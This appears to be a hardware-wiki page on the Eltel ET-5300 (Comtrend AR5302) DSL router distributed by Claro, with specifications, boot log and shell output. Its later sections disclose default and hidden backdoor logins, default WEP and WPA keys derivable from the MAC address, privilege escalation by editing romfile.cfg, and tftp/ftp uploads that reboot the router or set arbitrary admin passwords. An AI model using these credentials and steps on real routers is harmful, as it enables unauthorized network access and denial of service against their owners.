Eltel ET-5300
Eltel ET5300 V1
Manuf (OEM/ODM): Comtrend AR5302
Country of manuf.: China
Type: wireless router, dsl modem
Power: 12 VDC, 1 A
Connector type: barrel
CPU1: Ralink RT63365E (500 MHz)
FLA1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (Macronix MX25L6406E)
RAM1: 32 MiB33,554,432 B <br />262,144 Kib <br />32,768 KiB <br />256 Mib <br />0.0313 GiB <br /> (EtronTech EM6AA160TSB-5G)
Expansion IFs: none specified
WI1 chip1: Ralink RT5390HL
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL
ETH chip1: Ralink RT63365E
Switch: Ralink RT63365E
LAN speed: 100M
LAN ports: 4
WAN speed: 100M
WAN ports: 1
bgn
Additional chips
DSL AFE;Ralink;RT63087N;
Stock FW OS: Linux 2.6.22.15 TrendChip
Default SSID: TURBONETT_XXXXXX
Default IP address: 192.168.1.1
the IP 192.168.1.1 is used by 1304 additional devices
of which 0 are Eltel devices
Default login user: admin
Default login password: c1@r0
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
This router is distributed by Claro in large numbers. Manufactured by Comtrend according IEEE Standards MA-L database.
Links
Components
Board, headers, etc
The board layout is somewhat similar to Upvel UR-314AN, Upvel UR-354AN4G (with USB), Huawei HG532s, ZTE ZXHN H108L, and Edimax AR-7186. Silk screen says E241819 50XX13-350.
- J521 is likely the serial interface.
- The circuit board is prepared for an USB connector (J500). Needs an additional 5V regulator (U601).
Images
from User:Zerohero
Info
Bootlog
# cat /proc/kmsg <5>Linux version 2.6.22.15 (root@linux.local) (gcc version 4.3.4 (GCC) ) #11 SMP Tue Apr 2 09:57:08 CST 2013 <6>ISPRAM0: PA=00260000,Size=00008000,enabled <4>Enable SRAM=1c000001 <4>Ralink RT63365 SOC prom init <4>[DEBUG]Fix eth led for AR-5300 <4>CPU revision is: 00019555 <4>Determined physical RAM map: <4> memory: 02000000 @ 00000000 (usable) <7>On node 0 totalpages: 8192 <7> Normal zone: 64 pages used for memmap <7> Normal zone: 0 pages reserved <7> Normal zone: 8128 pages, LIFO batch:0 <4>3 available secondary CPU TC(s) <4>Built 1 zonelists. Total pages: 8128 <5>Kernel command line: console=ttyS0 rootfstype=squashfs es=1 <4>Primary instruction cache 64kB, physically tagged, 4-way, linesize 32 bytes. <4>Primary data cache 32kB, 4-way, linesize 32 bytes. <6>Synthesized TLB refill handler (23 instructions). <6>Synthesized TLB load handler fastpath (37 instructions). <6>Synthesized TLB store handler fastpath (37 instructions). <6>Synthesized TLB modify handler fastpath (36 instructions). <6>Cache parity protection disabled <4>PID hash table entries: 128 (order: 7, 512 bytes) <4>CPU frequency 498.00 MHz <4>Using 250.000 MHz high precision timer. <6>console handover: boot [early0] -> real [ttyS0] <4>Dentry cache hash table entries: 4096 (order: 2, 16384 bytes) <4>Inode-cache hash table entries: 2048 (order: 1, 8192 bytes) <6>Memory: 29276k/32768k available (2338k kernel code, 3492k reserved, 346k data, 148k init, 0k highmem) <6>SLUB: Genslabs=17, HWalign=32, Order=0-1, MinObjects=4, CPUs=4, Nodes=1 <7>Calibrating delay loop... 332.59 BogoMIPS (lpj=1662976) <4>Mount-cache hash table entries: 512 <4>34K sync es set to 1. <4>Config7: 0x80080500 <4>FPU Affinity set after 1105 emulations <4>Limit of 4 TCs set <4>TLB of 64 entry pairs shared by 2 VPEs <4>VPE 0: TC 0 1 2, VPE 1: TC 3 <4>IPI buffer pool of 32 buffers <4>CPU revision is: 00019555 <7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280) <4>TC 1 going on-line as CPU 1 <4>CPU revision is: 00019555 <7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280) <4>TC 2 going on-line as CPU 2 <4>CPU revision is: 00019555 <7>Calibrating delay loop... 249.03 BogoMIPS (lpj=1245184) <4>TC 3 going on-line as CPU 3 <6>Brought up 4 CPUs <4>migration_cost=10000 <6>NET: Registered protocol family 16 <4>RT63365_pcie_init <4>registering PCI controller with io_map_base unset <6>PCI: Bridge: 0000:00:00.0 <6> IO window: disabled. <6> MEM window: 20000000-200fffff <6> PREFETCH window: disabled. <4>PCI: Enabling device 0000:00:00.0 (0000 -> 0002) <7>PCI: Setting latency timer of device 0000:00:00.0 to 64 <6>NET: Registered protocol family 8 <6>NET: Registered protocol family 20 <6>NET: Registered protocol family 2 <6>Time: MIPS clocksource has been installed. <4>IP route cache hash table entries: 1024 (order: 0, 4096 bytes) <4>TCP established hash table entries: 1024 (order: 1, 12288 bytes) <4>TCP bind hash table entries: 1024 (order: 1, 8192 bytes) <6>TCP: Hash tables configured (established 1024 bind 1024) <6>TCP reno registered <6>squashfs: version 3.0 (2006/03/15) Phillip Lougher <6>io scheduler noop registered (default) <6>ttyS0 at I/O 0xbfbf0003 (irq = 1) is a TC3162 <6>PPP generic driver version 2.4.2 <6>PPP Deflate Compression module registered <6>PPP BSD Compression module registered <6>NET: Registered protocol family 24 <6>IMQ starting with 2 devices... <6>IMQ driver loaded successfully. <6> Hooking IMQ after NAT on PREROUTING. <6> Hooking IMQ before NAT on POSTROUTING. <4>tc3162: flash device 0x01000000 at 0x10000000 <6>tc3162: Found SPIFLASH 8MiB MX25L6405D <5>Creating 7 MTD partitions on "tc3162": <5>0x00000000-0x00010000 : "bootloader" <5>0x00010000-0x00020000 : "romfile" <5>0x00020000-0x00104c6f : "kernel" <4>mtd: partition "kernel" doesn't end on an erase block -- force read-only <5>0x00104c6f-0x004c6c6f : "rootfs" <4>mtd: partition "rootfs" doesn't start on an erase block boundary -- force read-only <5>0x00020000-0x007c0000 : "tclinux" <5>0x007c0000-0x00800000 : "reservearea" <5>0x00000000-0x00800000 : "total_flash" <4>RT3xxx EHCI/OHCI init. <4>Netfilter messages via NETLINK v0.30. <4>nf_conntrack version 0.5.0 (256 buckets, 2048 max) <4>ctnetlink v0.93: registering with nfnetlink. <4>nf_conntrack_rtsp v0.6.21 loading <4>nf_nat_rtsp v0.6.21 loading <4>ip_tables: (C) 2000-2006 Netfilter Core Team <6>TCP cubic registered <6>Initializing XFRM netlink socket <6>NET: Registered protocol family 1 <6>NET: Registered protocol family 10 <6>lo: Disabled Privacy Extensions <6>IPv6 over IPv4 tunneling driver <6>sit0: Disabled Privacy Extensions <6>NET: Registered protocol family 17 <6>NET: Registered protocol family 15 <6>802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com> <6>All bugs added by David S. Miller <davem@redhat.com> <4>VFS: Mounted root (squashfs filesystem) readonly. <6>Freeing unused kernel memory: 148k freed <4>module_sel: module license 'unspecified' taints kernel. <4> <4>tcfullcone version: tcfullcone V1.1.0.0 (Mar 5 2012-08:25:25). <4>TC3162 LED Manager 0.1 init <4> <4>tcledctrl version: tcledctrl V1.1.0.0 (Apr 2 2013-09:57:18). <4>tccicmd V1.1.0.0 (Apr 2 2013-09:57:20) <4>Adapter_Interrupts_Init: Successfully hooked IRQ 29 <4> <4>Adapter_Interrupts_Init: call back registeredAdapter_EIP93_Init: CmdRing_Handle=81860ffc <4>Adapter_EIP93_Init: ResRing_Handle=81860ff8 <4>Adapter: Successfully initialized EIP93v2 in ARM mode <4>PEC_Init: PRNG is initialized <6>femac.c:v1.00-NAPI 29.Mar.2011 <6>eth0: FE MAC Ethernet address: F8:8E:85:9C:5E:F4 <4>TSARM: TC3162 ATM SAR driver 1.5 init <4> <4>tc3162sar V1.2.0.0 (Apr 2 2013-09:57:16) <4>register autopvc cmd to sys <4>TSARM: TC3162 ATM SAR driver 1.5 done <4>ADSL DMT initialization starting <4>Begin AdslTaskInit..... <4>End AdslTaskInit <4>Begin to request IRQ 20 <4>DMT:Succeed to request IRQ 20 <4>Initializing ADSL F/W 3.20.6.0 ...... <4>Initializing ADSL F/W ........ done <4>ADSL HW version: b2, HCLK 166 <4>largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511) <4>SRAON <4>up right away <4> <4>tcsmux version: tcsmux V1.1.0.0 (Mar 5 2012-08:25:29). <4> <4>tcportbind version: tcportbind V1.1.0.0 (Mar 5 2012-08:25:32). <4>vlantag_drv_init <4>the number of cfg node is 68 <4>portbind_init <4>autopvc_init <4>logAccess_init LanguageSwitch_init vendorCfgFile_init The number of cache node is 5 <4>WPSActiveStatus = NULL <4>WPSOOBActive = NULL <4>ReCounterActive = NULL <4>WPSGenPinCode = NULL <4>sslca_write:get Frag Number failed! <4>The attribute is not in wifiMACTab <4> <4>lanHost_read: Create node LanHost ! <4>The remaining IMEM space cannot accommodate section .text.imem !! <4>Remaining IMEM space: -2280 bytes Section Size: 728 bytes <4>PCI: Enabling device 0000:01:00.0 (0000 -> 0002) <7>PCI: Setting latency timer of device 0000:01:00.0 to 64 <4>Mirror/redirect action on <5>Ebtables v2.0 registered <4>igmpsnoop V1.1.0.0 (Mar 5 2012-08:25:26) <4> <4>mldsnooping V1.1.0.0 (Mar 5 2012-08:25:28) <6>eth0: starting interface. <4>alloc_sram p=bc000800 free=7800 <4>alloc_sram p=bc002800 free=5800 <4>[macInit:2049]Fix eth led for AR-5300 <4>TC2105MJ, <6>Ralink HW NAT Module Enabled <6>device eth0 entered promiscuous mode <4>0x1300 = 00064380 <4>jiffies=ffff9274, POLLING_MODE_DETECT_INTV=300 <6>device ra0 entered promiscuous mode <6>device ra1 entered promiscuous mode <6>device ra2 entered promiscuous mode <6>device ra3 entered promiscuous mode <4> <4>Enabling SSL security system <4>SSL security system enabled<7>eth0.1: add 33:33:00:00:00:01 mcast address to master interface <7>eth0.1: add 01:00:5e:00:00:01 mcast address to master interface <7>eth0.2: add 33:33:00:00:00:01 mcast address to master interface <7>eth0.2: add 01:00:5e:00:00:01 mcast address to master interface <7>eth0.3: add 33:33:00:00:00:01 mcast address to master interface <7>eth0.3: add 01:00:5e:00:00:01 mcast address to master interface <7>eth0.4: add 33:33:00:00:00:01 mcast address to master interface <7>eth0.4: add 01:00:5e:00:00:01 mcast address to master interface <6>device eth0 left promiscuous mode <6>br0: port 1(eth0) entering disabled state <4>ANNEXAIJLM <4>========================insmod iptable_filter======================= <6>br0: port 9(eth0.4) entering learning state <6>br0: port 8(eth0.3) entering learning state <6>br0: port 7(eth0.2) entering learning state <6>br0: port 6(eth0.1) entering learning state <6>br0: port 5(ra3) entering learning state <6>br0: port 4(ra2) entering learning state <6>br0: port 3(ra1) entering learning state <6>br0: port 2(ra0) entering learning state <6>br0: topology change detected, propagating <6>br0: port 9(eth0.4) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 8(eth0.3) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 7(eth0.2) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 6(eth0.1) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 5(ra3) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 4(ra2) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 3(ra1) entering forwarding state <6>br0: topology change detected, propagating <6>br0: port 2(ra0) entering forwarding state <4>Radvd function activated! <4>Enter set first loop, IP addr by radvd <4>dhcp6s parameter activated by exec! <4>read WLAN driver from rt_device failed,set with default value! <4> <4>Enter cwmp boot, we will start tr69 Process <4>Parental Control: parental_execute() Enter. <4>[discovery:613]ifName=nas2, 88:43:e1:07:56:18:55679 <6>br0: starting userspace STP failed, staring kernel STP <4>Link State: LAN_1 up. <4>Failed to ioctl br0:0 <7>nas0: no IPv6 routers present <4>ThreadedTimerCheck: get last for first time <4>Failed to ioctl br0:0 <7>nas2: no IPv6 routers present
Bootloader
# cfeversion 1.0-004
Strings extracted from bootloader partition:
# cat /dev/mtd0 BootVer:1.0-004 TrendChip Technologies Corp. ADSL Modem admin 1234 AR-5302
Firmware
# version T111-73376CAR-C01_R10
Model
# model AR-5302
Board ID
# boardid Board ID = AR-5302
Operating system
# uname -a Linux tc 2.6.22.15 #11 SMP Tue Apr 2 09:57:08 CST 2013 mips unknown
Build
# build Build Time: Apr 02 2013 10:04:17
Modules
# cat /proc/modules ipt_REDIRECT 800 2 - Live 0xc0156000 iptable_filter 1024 1 - Live 0xc0150000 hw_nat 50256 0 - Live 0xc018a000 (P) mldsnooping 5088 0 - Live 0xc0158000 igmpsnoop 12256 0 - Live 0xc015b000 ebtable_nat 1024 1 - Live 0xc014e000 ebtable_broute 832 1 - Live 0xc009d000 ebt_ip6 2496 0 - Live 0xc0083000 ebt_ip 1952 0 - Live 0xc0099000 ebtable_filter 992 0 - Live 0xc0081000 ebtables 19744 5 ebtable_nat,ebtable_broute,ebt_ip6,ebt_ip,ebtable_filter, Live 0xc0075000 sch_prio 3744 2 - Live 0xc0059000 sch_htb 15328 0 - Live 0xc007c000 cls_fw 3392 2 - Live 0xc0057000 act_mirred 2704 2 - Live 0xc0055000 rt5390ap 815936 4 - Live 0xc028a000 (P) brg_shortcut 4816 0 - Live 0xc002a000 (P) tcvlantag 10080 0 - Live 0xc0071000 tcportbind 3856 0 - Live 0xc0039000 tcsmux 8912 0 - Live 0xc006d000 tc3162_dmt 820720 0 [permanent], Live 0xc01c0000 (P) tc3162l2sar 61568 2 - Live 0xc0088000 (P) raeth 58400 2 tc3162_dmt,tc3162l2sar, Live 0xc0042000 (P) crypto_k 28000 0 - Live 0xc0031000 (P) tccicmd 67232 4 rt5390ap,tc3162_dmt,tc3162l2sar,raeth, Live 0xc005b000 (P) tcledctrl 20736 4 rt5390ap,tc3162l2sar,raeth,tccicmd, Live 0xc003b000 (P) tcfullcone 2160 0 - Live 0xc002f000 module_sel 1312 4 rt5390ap,tcvlantag,tcportbind,tcsmux, Live 0xc002d000 (P)
MTD's
# cat /proc/mtd dev: size erasesize name mtd0: 00010000 00010000 "bootloader" mtd1: 00010000 00010000 "romfile" mtd2: 000e4c6f 00010000 "kernel" mtd3: 003c2000 00010000 "rootfs" mtd4: 007a0000 00010000 "tclinux" mtd5: 00040000 00010000 "reservearea" mtd6: 00800000 00010000 "total_flash"
Filesystems
# cat /proc/filesystems nodev rootfs nodev bdev nodev proc nodev sockfs nodev pipefs nodev anon_inodefs nodev futexfs nodev tmpfs nodev devpts squashfs nodev ramfs
Mounts
# cat /proc/mounts rootfs / rootfs rw 0 0 /dev/root / squashfs ro 0 0 proc /proc proc rw 0 0 ramfs /tmp ramfs rw 0 0 devpts /dev/pts devpts rw 0 0
IOmem
# cat /proc/iomem 00000000-01ffffff : System RAM 00020000-002688e7 : Kernel code 002688e8-002bf19f : Kernel data 1fba0000-1fbaffff : rt3xxx-ohci 1fbb0000-1fbbffff : rt3xxx-ehci 20000000-2fffffff : pcie memory space 20000000-200fffff : PCI Bus #01 20000000-2000ffff : 0000:01:00.0 20000000-2000ffff : 0000:01:00.0
IOports
# cat /proc/ioports 1f600000-1f61ffff : pcie IO space
CPU's
# cat /proc/cpuinfo system type : Ralink RT63365 SOC processor : 0 cpu model : MIPS 34K V5.5 BogoMIPS : 332.59 wait instruction : yes microsecond timers : yes tlb_entries : 64 extra interrupt vector : yes hardware watchpoint : yes ASEs implemented : mips16 dsp mt shadow register sets : 1 VCED exceptions : not available VCEI exceptions : not available unaligned accesses : 227088 processor : 1 cpu model : MIPS 34K V5.5 BogoMIPS : 249.85 wait instruction : yes microsecond timers : yes tlb_entries : 64 extra interrupt vector : yes hardware watchpoint : yes ASEs implemented : mips16 dsp mt shadow register sets : 1 VCED exceptions : not available VCEI exceptions : not available unaligned accesses : 227088 processor : 2 cpu model : MIPS 34K V5.5 BogoMIPS : 249.85 wait instruction : yes microsecond timers : yes tlb_entries : 64 extra interrupt vector : yes hardware watchpoint : yes ASEs implemented : mips16 dsp mt shadow register sets : 1 VCED exceptions : not available VCEI exceptions : not available unaligned accesses : 227088 processor : 3 cpu model : MIPS 34K V5.5 BogoMIPS : 249.03 wait instruction : yes microsecond timers : yes tlb_entries : 64 extra interrupt vector : yes hardware watchpoint : yes ASEs implemented : mips16 dsp mt shadow register sets : 1 VCED exceptions : not available VCEI exceptions : not available unaligned accesses : 227088
Interrupts
# cat /proc/interrupts CPU0 CPU1 CPU2 CPU3 1: 4717 10601 1043 0 MIPS TC3162 UART 9: 84 11 546 1158 MIPS SMTC_IPI 10: 0 0 0 0 MIPS watchdog 14: 0 0 0 0 MIPS performance 20: 1259488 1817925 92279 0 MIPS dmt20 22: 0 0 0 2632 MIPS eth0 23: 0 0 0 0 MIPS TSARM 25: 23156 34192 1825 0 MIPS ra0 29: 0 0 0 0 MIPS safenet-vdriver-eip93 31: 204088 41065 6946 251974 MIPS timer 33: 0 0 0 0 MIPS bus timeout ERR: 0
LAN MAC
# mac MAC Addr: F8:8E:85:9C:5E:F4
Netstat
# netstat -a Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:5555 *:* LISTEN tcp 0 0 *:domain *:* LISTEN tcp 0 0 *:ssh *:* LISTEN tcp 0 0 *:7547 *:* LISTEN tcp 0 0 192.168.1.1:ssh 192.168.1.2:58897 ESTABLISHED tcp 0 0 *:http *:* LISTEN tcp 0 0 *:ftp *:* LISTEN tcp 0 0 *:domain *:* LISTEN tcp 0 0 *:telnet *:* LISTEN tcp 0 0 *:https *:* LISTEN udp 0 0 *:sd *:* udp 0 0 *:domain *:* udp 0 0 *:bootps *:* udp 0 0 *:1900 *:* udp 0 0 *:32768 *:* udp 0 0 *:dhcpv6-server *:* udp 0 0 *:domain *:* udp 0 0 *:tftp *:* raw 0 0 *:58 *:* 0 Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 2 [ ACC ] STREAM LISTENING 523 /tmp/tcapi_sock unix 2 [ ] DGRAM 2107 unix 3 [ ] STREAM CONNECTED 2089 unix 3 [ ] STREAM CONNECTED 2088 unix 2 [ ] STREAM CONNECTED 1288 unix 2 [ ] STREAM CONNECTED 1284 /tmp/tcapi_sock
Portscan (from Internet)
$ nmap -sS xx.xx.xx.xx Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 19:04 CDT Nmap scan report for xx.xx.xx.xx Host is up (0.44s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp filtered ftp 22/tcp filtered ssh 23/tcp filtered telnet 25/tcp filtered smtp 53/tcp open domain 80/tcp filtered http 113/tcp filtered ident 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 161/tcp filtered snmp 443/tcp open https 445/tcp filtered microsoft-ds 593/tcp filtered http-rpc-epmap 4444/tcp filtered krb524 5555/tcp open freeciv Nmap done: 1 IP address (1 host up) scanned in 32.65 seconds
Stimulating port 5555 (from Internet)
$ nc xx.xx.xx.xx 5555 get HTTP/1.1 405 Method Not Allowed Allow: GET, HEAD, POST, PUT Content-Length: 0 Server: RomPager/4.07 UPnP/1.0
See Wikipedia: Universal_Plug_and_Play Access_from_the_Internet
and Full Disclosure: RomPager/4.07 UPnP/1.0. Issue: A reboot can be caused when a special crafted http request is sent
Processes
# ps PID Uid VmSize Stat Command 1 admin 452 S init 2 admin SW< [kthreadd] 3 admin SW< [migration/0] 4 admin SWN [ksoftirqd/0] 5 admin SW< [migration/1] 6 admin SWN [ksoftirqd/1] 7 admin SW< [migration/2] 8 admin SWN [ksoftirqd/2] 9 admin SW< [migration/3] 10 admin SWN [ksoftirqd/3] 11 admin SW< [events/0] 12 admin SW< [events/1] 13 admin SW< [events/2] 14 admin SW< [events/3] 15 admin SW< [khelper] 16 admin SW< [kblockd/0] 17 admin SW< [kblockd/1] 18 admin SW< [kblockd/2] 19 admin SW< [kblockd/3] 20 admin SW [pdflush] 21 admin SW [pdflush] 22 admin SW< [kswapd0] 23 admin SW< [aio/0] 24 admin SW< [aio/1] 25 admin SW< [aio/2] 26 admin SW< [aio/3] 27 admin SW< [mtdblockd] 94 admin SW< [dmtd] 144 admin 1300 S /userfs/bin/cfg_manager 146 admin 1300 S /userfs/bin/cfg_manager 147 admin 1300 S /userfs/bin/cfg_manager 318 admin SW [RtmpCmdQTask] 319 admin SW [RtmpWscTask] 368 admin 216 S tcwdog -t 1 /dev/watchdog 372 admin 144 S utelnetd -l /bin/login -d 379 admin 676 S /userfs/bin/boa -c /boaroot -d 677 admin 304 S br2684ctl -c 0 -e 0 -t ubr -p 0 -a 0.0.32 691 admin 632 S pppd unit 0 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas0 defaultroute noipdefault persist mtu 1492 mru 1492 787 admin 304 S br2684ctl -c 2 -e 0 -t ubr -p 0 -a 0.0.45 801 admin 636 S pppd unit 2 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas2 defaultroute noipdefault persist mtu 1492 mru 1492 1007 admin 440 S /userfs/bin/radvd -C /etc/radvd.conf -p /var/run/radvd.pid 1015 admin 452 S /userfs/bin/dhcp6s -c /etc/dhcp6s.conf br0 -p /var/run/dhcp6s.pid 1039 admin 420 S /usr/sbin/udhcpd 1049 admin 424 S /userfs/bin/dnsmasq 1053 admin 1224 S /userfs/bin/tr69 1235 admin 312 S /userfs/bin/inetd 1248 admin 504 S /userfs/bin/siproxd --config /etc/alg/siproxd.conf 1249 admin 504 S /userfs/bin/siproxd --config /etc/alg/siproxd.conf 1250 admin 180 R /userfs/bin/tftpd 1251 admin 504 S /userfs/bin/siproxd --config /etc/alg/siproxd.conf 1256 admin 1224 S /userfs/bin/tr69 1257 admin 1224 S /userfs/bin/tr69 1279 admin 332 S init 1508 admin 616 R /userfs/bin/dropbear -i 1513 admin 492 R -sh
DNSmasq
# dnsmasq --version Dnsmasq version 2.52 Copyright (c) 2000-2010 Simon Kelley Compile time options IPv6 GNU-getopt no-RTC no-DBus no-I18N no-DHCP no-TFTP
Dropbear
# dropbear -v Unknown argument -v Dropbear sshd v0.52
EBtables
# ebtables --version ebtables v2.0.8-2 (May 2007)
Wireless access
In the following description XXXXX stands for the last 3 octets (in upper case) of LAN MAC (e.g. LAN MAC=F8:8E:85:9C:5E:F4 --> XXXXXX=9C5EF4). WLAN MAC is +1 (e.g. F8:8E:85:9C:5E:F5). WAN MAC is +2 (e.g. F8:8E:85:9C:5E:F6).
- Default SSID: TURBONETT_XXXXXX (e.g. TURBONETT_9C5EF4)
- Default WEP key: Made of last 5 octets (in uppercase) of LAN MAC. Can be easily constructed as OUI is always F8:8E:85 (e.g. WEP key=8E859C5EF4).
The router supports 4 WLAN's in total. By default SSID2-4 are hidden but active (see screenshots), and can be identified by a specific OUI. SSID2-4 credentials are rarely changed by users, and wireless acccess is gained easily as defaults are straightforward!
WLAN2
- Default SSID: TURBONETT_XXXXXX-1 (e.g. TURBONETT_9C5EF4-1)
- Default WPA/WPA2 passphrase: 1234567890
- OUI: FA:8E:85
WLAN3
- Default SSID: TURBONETT_XXXXXX-2 (e.g. TURBONETT_9C5EF4-2)
- Default WPA/WPA2 passphrase: 1234567890
- OUI: FE:8E:85
WLAN4
- Default SSID: TURBONETT_XXXXXX-3 (e.g. TURBONETT_9C5EF4-3)
- Default WPA/WPA2 passphrase: 1234567890
- OUI: 02:8E:85
Router login
Login to the ET-5300 is possible using the following protocols.
- Web interface: http and https (invalid certificate)
- Console login: telnet and ssh
- File transfer: tftp and ftp (root directory is /var/tmp)
Many routers distributed by the Claro company use a standard default login, and the ET-5300 is no exception.
- Default username: admin
- Default password: c1@r0
The ET-5300 supports 3 login names in total, but only the password for login1 (admin) can be changed in the web interface.
- The following credentials for login2 and login3 are taken from the romfile.cfg;
- login3 works for the web interface (on a subset of functionallity) and console ssh login!
Login2
- Username: qwertyuiop
- Password: 1234567890
Login3
- Username: user3
- Password: 1234567890
(P.S. The Sitecom WLM-3500 is affected by the same backdoor accounts [1].
- Another candidate might be the Aztech DSL5001EN [2]).
Romfile
The router's configuration can be saved to the XML formatted romfile.cfg (web interface: Maintenance >> Firmware >> Configuration Backup or simply http://192.168.1.1/romfile.cfg). Editing and then restoring the romfile.cfg offers extended configuration possibilities. Here are some ideas...
Login Credentials
As described above, login2 and login3 have some impractical usernames and passwords. This can be corrected by modifing the parameters of Entry1 and Entry2 (think of better passwords then in this example). The new credentials do work for the web interface and console ssh logins!
<Entry1 username="user2" web_passwd="1234" <Entry2 username="user3" web_passwd="1234"
Display Mask
Logging in as user2 or user3 offers a web interface with reduced menu / permission:
Note that for both users the Firmware menu is still accessible which means one can still backup/restore the router's configuration. This allows user2 and user3 to gain full permission! As seen in the romfile.cfg, permissions are defined by the so called display_mask:
<Entry0 display_mask="DF FF F7 BF FF DF FF FF FF" <Entry1 display_mask="D2 8C 84 8C 8C 8C 8C 8C 8C" <Entry2 display_mask="5E 8C 6 8C 8C 8C 8C 8C 8C"
In the following example display_mask of user3 is not just copied from admin, but set to the maximum possible value. Surprisingly this reveals an additional Advanced Wireless menu as seen in the screenshots bellow!
<Entry2 username="user3" web_passwd="1234" display_mask="FF FF FF FF FF FF FF FF FF"
Vulnerabilities
Uploading any file of any size by tftp or ftp reboots the router!
$ echo "text" > file $ tftp 192.168.1.1 tftp> put file Sent 6 bytes in 13.9 seconds
$ ftp 192.168.1.1 220 bftpd 2.2 at 192.168.1.1 ready. Name (192.168.1.1:xxx): admin 331 Password please. Password: ***** 230 User logged in. ftp> put file local: file remote: file 200 PORT 192.168.1.100:44443 OK 150 BINARY data connection established. The firmware is illegal!! 6 bytes sent in 0.00 secs (1813.6 kB/s)
Uploading a modified romfile.cfg via tftp allows arbitrary login. The Sent NNNNN bytes in NN seconds message should appear, otherwise the romfile was not accepted (although the router reboots).
<Account> <Entry0 username="admin" web_passwd="stardust" console_passwd="stardust"
$ tftp 192.168.1.1 tftp> put romfile.cfg Sent 29121 bytes in 13.5 seconds